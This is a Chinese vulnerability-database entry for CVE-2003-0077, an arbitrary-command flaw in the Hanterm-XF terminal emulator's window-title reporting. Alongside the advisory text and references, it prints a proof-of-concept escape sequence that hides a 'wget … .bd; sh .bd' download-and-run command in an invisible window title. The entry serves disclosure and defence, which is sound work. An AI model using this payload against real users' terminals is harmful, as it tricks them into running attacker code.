Hanterm-XF窗口标题转义序列命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1203014 漏洞类型 设计错误
发布时间 2003-02-24 更新时间 2006-01-18
CVE编号 CVE-2003-0077 CNNVD-ID CNNVD-200303-051
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200303-051
|漏洞详情
转义序列(escapesequence)是一系列由ASCII转义字符(0x1B)开始的字符序列,并附带特殊的参数构成,转义序列一般原用于控制显示设备如终端,现在扩展在大多数操作系统中允许多种形式的交互。转义序列可以用于更改文本属性(颜色,宽度),移动鼠标位置,重配置键盘,更新窗口标题,或者操作打印机等。Hanterm-XF终端模拟器的窗口标题报告功能由于没有检查用户插入的转义字符,远程攻击者可以利用这个漏洞在终端窗口标题中插入任意转义序列字符而以执行用户权限执行任意命令。多数终端模拟器支持使用转义序列通过SHELL来设置窗口标题,这个功能由DEC的DECterm中实现,已经移植在多数模拟器中,使用echo命令可以设置终端的窗口标题:$echo-e"\e]2;Thisisthenewwindowtitle\a"当上面的命令显示在终端上的时候,它会设置窗口标题为上面的字符串,设置窗口标题本身没有安全问题,但是Hanterm-XF提供转义序列来报告当前窗口标题,获得标题后直接放到命令行中执行。由于多数模拟器处理转义序列不能在窗口标题中嵌入回车符,因此要执行标题作为命令处理,需要用户交互按回车键,如下面的报告窗口标题的转义序列:$echo-e"\e]2;;wget127.0.0.1/.bd;sh.bd;exit;\a\e[21t\e]2;xterm\aPressEnter>\e[8m;"当然这些标题没有人会去执行,但是通过设置标题为不可见字符,如前景后景全为一个颜色,在诱使用户处理窗口后,用户在不能看到标题的情况下而执行了恶意命令,有可能导致各种攻击,如开端口,发送敏感文件等操作。
|参考资料

来源:XF
名称:terminal-emulator-window-title(11414)
链接:http://www.iss.net/security_center/static/11414.php
来源:VULNWATCH
名称:20030224TerminalEmulatorSecurityIssues
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0093.html
来源:REDHAT
名称:RHSA-2003:071
链接:http://www.redhat.com/support/errata/RHSA-2003-071.html
来源:REDHAT
名称:RHSA-2003:070
链接:http://www.redhat.com/support/errata/RHSA-2003-070.html
来源:OSVDB
名称:4917
链接:http://www.osvdb.org/4917
来源:BUGTRAQ
名称:20030224TerminalEmulatorSecurityIssues
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2